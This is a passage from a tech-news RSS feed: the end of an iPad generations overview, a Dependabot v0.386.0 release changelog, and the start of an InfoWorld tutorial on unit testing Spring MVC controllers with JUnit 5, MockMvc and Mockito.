(8.3″)A15USB-C2nd genAll-new design, modernized mini2022iPad Air 5M1USB-C2nd genM-series comes to Air2022iPad (10th gen, 10.9″)A14USB-CUSB-C / 1st gen via adapterLandscape front camera2022iPad Pro (M2)M2USB-C / Thunderbolt2nd genIntroduces Pencil hover2024iPad Air (M2, 11″ / 13″)M2USB-CPencil Pro / USB-CFirst 13″ Air; Pencil Pro support2024iPad Pro (M4, 11″ / 13″)M4USB-C / ThunderboltPencil ProUltra Retina XDR OLED; thinnest iPad yet2024iPad mini 7A17 ProUSB-CPencil Pro / USB-CMajor internal leap for mini2025iPad Air (M3)M3USB-CPencil Pro / USB-CSpec bump; keeps pace with Pro features2025iPad (11th gen)A16 BionicUSB-CPencil (1st gen) / USB-CMagic Keyboard Folio support; Smart Connector



Conclusion



From a 9.7-inch “big iPod touch” to an M4-powered OLED slate with a pro-grade stylus, iPad never stood still. The early years chased thinness and Retina clarity; then came Pro accessories and 120Hz; today, Apple silicon and OLED push the tablet squarely into laptop territory for many workflows. Whether you value a featherweight mini, a balanced Air, or the bleeding-edge Pro, there’s a clear through-line: every generation made the computer more touchable, more portable, and, bit by bit, more capable.



FAQs



Which iPad first supported Apple Pencil? The 2015 iPad Pro 12.9 introduced Apple Pencil (1st gen). Pencil support expanded to the budget iPad in 2018, then to Pencil (2nd) in the 2018 Pro redesign, and to Pencil Pro in 2024 on the new Pro/Air.  Which iPad first used USB-C? The 2018 iPad Pro line. Air switched in 2020, mini in 2021, and the 10th-gen iPad in 2022.  What’s the thinnest iPad? The 2024 iPad Pro (M4)—Apple’s thinnest product to date—despite packing tandem OLED and a huge performance jump.  Do all iPad Pros have 120Hz ProMotion? All modern Pros (2017 and later) do; the 2015/2016 Pros pre-date ProMotion.  Is the iPad mini still alive? Yes. Mini 7 (2024) upgraded to A17 Pro, keeping the compact 8.3-inch form while adding modern Pencil options.]]></content:encoded>
</item>
<item>
<title><![CDATA[v0.386.0]]></title>
<description><![CDATA[What's Changed

Capture offending gem details on bundler registry metadata errors by @kbukum1 in #15512
Bundler: apply empty-checksum metadata patch to the v2 helper by @kbukum1 in #15513
[Update graph] Ensure bystander txt files are removed before parsing for Python by @brrygrdn in #15508
Handle...]]></description>
<link>https://tsecurity.de/de/3665919/it-security-tools/v03860/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665919/it-security-tools/v03860/</guid>
<pubDate>Mon, 13 Jul 2026 18:35:24 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>Capture offending gem details on bundler registry metadata errors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kbukum1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kbukum1">@kbukum1</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4824191752" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15512" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15512/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15512">#15512</a></li>
<li>Bundler: apply empty-checksum metadata patch to the v2 helper by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kbukum1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kbukum1">@kbukum1</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4824414250" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15513" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15513/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15513">#15513</a></li>
<li>[Update graph] Ensure bystander txt files are removed before parsing for Python by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brrygrdn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brrygrdn">@brrygrdn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4819771035" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15508" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15508/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15508">#15508</a></li>
<li>Handle global.json with no SDK version in dotnet_sdk parser by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4821557169" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15510" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15510/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15510">#15510</a></li>
<li>Type the cargo ecosystem and remove it from the T.untyped burndown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4810941973" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15492" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15492/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15492">#15492</a></li>
<li>Type the conda ecosystem and remove it from the T.untyped burndown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4811676578" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15493" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15493/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15493">#15493</a></li>
<li>Type the docker ecosystem and remove it from the T.untyped burndown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4811747259" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15495" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15495/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15495">#15495</a></li>
<li>Use shared git-tag cooldown in terraform by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/robaiken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/robaiken">@robaiken</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4786767074" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15472" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15472/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15472">#15472</a></li>
<li>Retry corepack once on signature metadata error by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> with @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4783580732" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15466" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15466/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15466">#15466</a></li>
<li>Type the deno, elm, devcontainers, bazel, and helm ecosystems by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4833014415" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15527" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15527/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15527">#15527</a></li>
<li>Add word-separator and lowercase formatting for branch name by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AbhishekBhaskar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AbhishekBhaskar">@AbhishekBhaskar</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4791908912" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15478" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15478/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15478">#15478</a></li>
<li>Fix Docker cooldown not respected for multi-arch images missing Last-Modified by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/robaiken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/robaiken">@robaiken</a> with @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4796035244" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15486" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15486/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15486">#15486</a></li>
<li>Reduce redundant git-source probes during npm metadata resolution by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> with @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4793483366" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15480" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15480/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15480">#15480</a></li>
<li>Type the maven ecosystem and remove it from the T.untyped burndown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4833182059" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15531" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15531/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15531">#15531</a></li>
<li>Add branch name config template format support with validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AbhishekBhaskar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AbhishekBhaskar">@AbhishekBhaskar</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4835027976" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15535" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15535/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15535">#15535</a></li>
<li>fix(gradle): prefer local gradlew for lockfile updates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4847310998" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15546" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15546/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15546">#15546</a></li>
<li>helm: support versioning-strategy (range-preserving updates) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/casey-robertson-paypal/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/casey-robertson-paypal">@casey-robertson-paypal</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4585878635" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15218" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15218/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15218">#15218</a></li>
<li>Bump gradle from 9.4.1-jdk21-ubi to 9.6.1-jdk21-ubi in /gradle by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4813506019" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15498" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15498/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15498">#15498</a></li>
<li>[Update graph] Add support for requirements.txt 'layering' instead of compressing to a single file by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brrygrdn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brrygrdn">@brrygrdn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4829476790" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15521" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15521/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15521">#15521</a></li>
<li>Allow periods in Helm values file names for Docker ecosystem by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/telnet23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/telnet23">@telnet23</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4862784915" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15557" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15557/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15557">#15557</a></li>
<li>Match existing group PRs covering a subset of job directories by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IanButterworth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IanButterworth">@IanButterworth</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4850701816" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15548" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15548/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15548">#15548</a></li>
<li>Bump library/golang from 1.26.1-bookworm to 1.26.5-bookworm in /go_modules by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4867732850" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15562" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15562/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15562">#15562</a></li>
<li>Fix npm security updates for transitive dependencies in workspace monorepos by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Swampen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Swampen">@Swampen</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4826508534" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15514" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15514/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15514">#15514</a></li>
<li>Add helm to the smoke-test matrix by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/casey-robertson-paypal/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/casey-robertson-paypal">@casey-robertson-paypal</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4857335602" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15554" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15554/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15554">#15554</a></li>
<li>v0.386.0 by @dependabot-core-action-automation[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4869767530" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15564" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15564/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15564">#15564</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/telnet23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/telnet23">@telnet23</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4862784915" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15557" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15557/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15557">#15557</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Swampen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Swampen">@Swampen</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4826508534" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15514" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15514/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15514">#15514</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/dependabot/dependabot-core/compare/v0.385.0...v0.386.0"><tt>v0.385.0...v0.386.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Unit testing Spring MVC applications with JUnit 5]]></title>
<description><![CDATA[Spring is a reliable and popular framework for building web and enterprise Java applications. In this article, you’ll learn how to unit test each layer of a Spring MVC application, using built-in testing tools from JUnit 5 and Spring to mock each component’s dependencies. In addition to unit test...]]></description>
<link>https://tsecurity.de/de/3665676/ai-nachrichten/unit-testing-spring-mvc-applications-with-junit-5/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665676/ai-nachrichten/unit-testing-spring-mvc-applications-with-junit-5/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:41 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/4083578/a-fresh-look-at-the-spring-framework.html" data-type="link" data-id="https://www.infoworld.com/article/4083578/a-fresh-look-at-the-spring-framework.html">Spring</a> is a reliable and popular framework for building web and enterprise <a href="https://www.infoworld.com/java/">Java</a> applications. In this article, you’ll learn how to unit test each layer of a Spring MVC application, using built-in testing tools from <a href="https://www.infoworld.com/article/3993538/how-to-test-your-java-applications-with-junit-5.html">JUnit 5</a> and Spring to mock each component’s dependencies. In addition to unit testing with MockMvc, Mockito, and Spring’s <code>TestEntityManager</code>, I’ll also briefly introduce slice testing using the <code>@WebMvcTest</code> and <code>@DataJpaTest</code> annotations, used to optimize unit tests on web controllers and databases.</p>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/3993538/how-to-test-your-java-applications-with-junit-5.html">How to test your Java applications with JUnit 5</a>.</strong></p>



<h2 class="wp-block-heading">Overview of testing Spring MVC applications</h2>



<p class="wp-block-paragraph">Spring MVC applications are defined using three technology layers:</p>



<ul class="wp-block-list">
<li><em>Controllers</em> accept web requests and return web responses.</li>



<li><em>Services</em> implement the application’s business logic.</li>



<li><em>Repositories</em> persist data to and from your back-end <a href="https://www.infoworld.com/article/2337457/sql-at-50-whats-next-for-the-structured-query-language.html">SQL</a> or <a href="https://www.infoworld.com/article/2260280/what-is-nosql-databases-for-a-cloud-scale-future.html">NoSQL</a> database.</li>
</ul>



<p class="wp-block-paragraph">When we unit test Spring MVC applications, we test each layer separately from the others. We create mock implementations, typically using <a href="https://site.mockito.org/">Mockito</a>, for each layer’s dependencies, then we simulate the logic we want to test. For example, a controller may call a service to retrieve a list of objects. When testing the controller, we create a mock service that either returns the list of objects, returns an empty list, or throws an exception. This test ensures the controller behaves correctly.</p>



<p class="wp-block-paragraph">We’ll use Spring MVC to build and test a simple web service that manages widgets. The structure of the web service is shown here:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/10/TestingSpringMVC-fig1.png?w=1024" alt="Diagram of a Spring MVC web service application." class="wp-image-4078126" width="1024" height="286" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Steven Haines</p></div>



<p class="wp-block-paragraph">This is a classic MVC pattern. We have a <em>widget controller</em> that handles <a href="https://www.infoworld.com/article/2334742/what-is-rest-the-de-facto-web-architecture-standard.html">RESTful requests</a> and delegates its business functionality to a <em>widget service</em>, which uses a <em>widget repository</em> to persist widgets to and from an in-memory H2 database.</p>



<p class="wp-block-paragraph"><strong>Get the source: <a href="https://b2b-contenthub.com/wp-content/uploads/2025/10/spring-mvc-unit-testing-iw.zip" data-type="link" data-id="https://b2b-contenthub.com/wp-content/uploads/2025/10/spring-mvc-unit-testing-iw.zip">Download the source code for this article</a>.</strong></p>



<h2 class="wp-block-heading">Unit testing a Spring MVC controller with MockMvc</h2>



<p class="wp-block-paragraph">Setting up a Spring MVC controller test is a two-step process:</p>



<ul class="wp-block-list">
<li>Annotate your test class with <code>@WebMvcTest</code>.</li>



<li>Autowire a <code>MockMvc</code> instance into your controller.</li>
</ul>



<p class="wp-block-paragraph">We could annotate all our test classes with <code>@SpringBootTest</code>, but we’ll use <code>@WebMvcTest</code> instead. The reason is that the <code>@WebMvcTest</code> annotation is used for <em>slice testing</em>. Whereas <code>@SpringBootTest</code> loads your entire Spring application context, <code>@WebMvcTest</code> loads only your web-related resources. Furthermore, if you specify a controller class in the annotation, it will only load the specific controller you want to test. Testing a single “slice” of your application reduces both the amount of compute resources required to set up the test and the time required to run a test.</p>



<p class="wp-block-paragraph">For example, when we test a controller, we’ll mock just the services it uses, and we won’t need any repositories at all. If we don’t need them, then we needn’t waste time loading them. Slice tests were created to make tests perform better and run faster.</p>



<p class="wp-block-paragraph">Here’s the source code for the <code>Widget</code> class we’ll be managing:</p>



<pre class="wp-block-code"><code>package com.infoworld.widgetservice.model;
import jakarta.persistence.Entity;
import jakarta.persistence.GeneratedValue;
import jakarta.persistence.GenerationType;
import jakarta.persistence.Id;

@Entity
public class Widget {
    @Id
    @GeneratedValue(strategy = GenerationType.AUTO)
    private Long id;
    private String name;
    private int version;

    public Widget() {
    }

    public Widget(String name) {
        this.name = name;
    }

    public Widget(String name, int version) {
        this.name = name;
        this.version = version;
    }

    public Widget(Long id, String name, int version) {
        this.id = id;
        this.name = name;
        this.version = version;
    }

    public Long getId() {
        return id;
    }

    public void setId(Long id) {
        this.id = id;
    }

    public String getName() {
        return name;
    }

    public void setName(String name) {
        this.name = name;
    }

    public int getVersion() {
        return version;
    }

    public void setVersion(int version) {
        this.version = version;
    }
}</code></pre>



<p class="wp-block-paragraph">A <code>Widget</code> is a <a href="https://www.infoworld.com/article/2259807/what-is-jpa-introduction-to-the-java-persistence-api.html">JPA entity</a> that manages three fields:</p>



<ul class="wp-block-list">
<li><em>id</em> is the primary key of the table, annotated with <code>@Id</code> and <code>@GeneratedValue</code>, with an automatic generation strategy.</li>



<li><em>name</em> is the name of the widget.</li>



<li><em>version</em> is the version of the widget resource. We’ll use this value to populate our <code>eTag</code> value and check it in our <code>PUT</code> operation’s <code>If-Match </code>header value. This ensures the widget being updated is not stale.</li>
</ul>



<p class="wp-block-paragraph">Here’s the source code for the controller we’ll be testing (<code>WidgetController.java</code>):</p>



<pre class="wp-block-code"><code>package com.infoworld.widgetservice.web;

import java.net.URI;
import java.net.URISyntaxException;
import java.util.List;
import java.util.Optional;
import com.infoworld.widgetservice.model.Widget;
import com.infoworld.widgetservice.service.WidgetService;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.http.HttpStatus;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.DeleteMapping;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.PutMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestHeader;
import org.springframework.web.bind.annotation.RestController;

@RestController
public class WidgetController {
    @Autowired
    private WidgetService widgetService;
    @GetMapping("/widget/{id}")
    public ResponseEntity getWidget(@PathVariable Long id) {
        return widgetService.findById(id)
                .map(widget -&gt; {
                    try {
                        return ResponseEntity
                                .ok()
                                .location(new URI("/widget/" + id))
                                .eTag(Integer.toString(
                                               widget.getVersion()))
                                .body(widget);
                    } catch (URISyntaxException e) {
                        return ResponseEntity
                          .status(HttpStatus.INTERNAL_SERVER_ERROR)
                          .build();
                    }
                })
                .orElse(ResponseEntity.notFound().build());
    }
    @GetMapping("/widgets")
    public List getWidgets() {
        return widgetService.findAll();
    }
    @PostMapping("/widgets")
    public ResponseEntity createWidget(@RequestBody Widget widget)
    {
        Widget newWidget = widgetService.create(widget);
        try {
           return ResponseEntity
                   .created(new URI("/widget/" + newWidget.getId()))
                   .eTag(Integer.toString(newWidget.getVersion()))
                   .body(newWidget);
        } catch (URISyntaxException e) {
            return ResponseEntity
                    .status(HttpStatus.INTERNAL_SERVER_ERROR)
                    .build();
        }
    }

    @PutMapping("/widget/{id}")
    public ResponseEntity updateWidget(@PathVariable Long id,
                                          @RequestBody Widget widget,
                         @RequestHeader("If-Match") Integer ifMatch) {
        Optional existingWidget = widgetService.findById(id);
        return existingWidget.map(w -&gt; {
            if (w.getVersion() != ifMatch) {
                return ResponseEntity.status(HttpStatus.CONFLICT)
                                     .build();
            }

            w.setName(widget.getName());
            w.setVersion(w.getVersion() + 1);

            Widget updatedWidget = widgetService.save(w);
            try {
                return ResponseEntity.ok()
                        .location(new URI("/widget/" + 
                                      updatedWidget.getId()))
                        .eTag(Integer.toString(
                                      updatedWidget.getVersion()))
                        .body(updatedWidget);
            } catch (URISyntaxException e) {
                throw new RuntimeException(e);
            }
        }).orElse(ResponseEntity.notFound().build());
    }

    @DeleteMapping("widget/{id}")
    public ResponseEntity deleteWidget(@PathVariable Long id) {
        Optional existingWidget = widgetService.findById(id);
        return existingWidget.map(w -&gt; {
           widgetService.deleteById(w.getId());
           return ResponseEntity.ok().build();
        }).orElse(ResponseEntity.notFound().build());
    }
}</code></pre>



<p class="wp-block-paragraph">The <code>WidgetController</code> handles <code>GET</code>, <code>POST</code>, <code>PUT</code>, and <code>DELETE</code> operations, following standard RESTful principles, so we’re going to write tests for each operation.</p>



<p class="wp-block-paragraph">The following source code shows the structure of our test class (<code>WidgetControllerTest.java</code>):</p>



<pre class="wp-block-code"><code>package com.infoworld.widgetservice.web;

@WebMvcTest(WidgetController.class)
public class WidgetControllerTest {
    @Autowired
    private MockMvc mockMvc;

    @MockitoBean
    private WidgetService widgetService;
}</code></pre>



<p class="wp-block-paragraph">I omitted the imports for readability, but the important thing to note is that the class is annotated with the <code>@WebMvcTest</code> annotation, and that we pass in the <code>WidgetController.class</code> as the controller we’re testing. This tells Spring to only load the <code>WidgetController</code> and no other Spring resources. The <code>@WebMvcTest</code> annotation includes other annotations, but the important one for our tests is <code>@AutoConfigureMockMvc</code>, which will cause Spring to create a <code>MockMvc</code> instance and add it to the application context. That lets us autowire it into our test class using the <code>@Autowired</code> annotation.</p>



<p class="wp-block-paragraph">Next, we use the <code>@MockitoBean</code> annotation to use Mockito to create a mock implementation of the <code>WidgetService</code>, after which Spring will autowire it into the <code>WidgetController</code> class. This lets us control the behavior of the <code>WidgetService</code> for the <code>WidgetController</code> test cases we’re writing. Note that starting in Spring Boot version 3.4, <code>@MockitoBean</code> replaced <code>@MockBean</code>. Everything you know about <code>@MockBean</code> translates to using <code>@MockitoBean</code>—with some improvements.</p>



<h3 class="wp-block-heading">Unit testing GET /widgets</h3>



<p class="wp-block-paragraph">Let’s start with the easiest test case, a test for <code>GET /widgets</code>:</p>



<pre class="wp-block-code"><code>@Test
void testGetWidgets() throws Exception {
    List widgets = new ArrayList();
    widgets.add(new Widget(1L, "Widget 1", 1));
    widgets.add(new Widget(2L, "Widget 2", 1));
    widgets.add(new Widget(3L, "Widget 3", 1));

    when(widgetService.findAll()).thenReturn(widgets);

    mockMvc.perform(get("/widgets"))
            .andExpect(status().isOk())
            .andExpect(jsonPath("$.length()").value(3))
            .andExpect(jsonPath("$[0].id").value(1L))
            .andExpect(jsonPath("$[0].name").value("Widget 1"))
            .andExpect(jsonPath("$[0].version").value(1));
};</code></pre>



